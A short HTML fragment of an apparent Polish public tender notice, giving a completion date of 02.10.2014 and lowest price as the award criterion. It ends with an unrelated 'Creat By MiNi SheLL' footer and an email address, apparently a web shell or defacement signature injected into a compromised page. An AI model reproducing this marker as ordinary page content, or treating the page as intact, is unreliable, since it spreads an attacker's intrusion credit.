<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com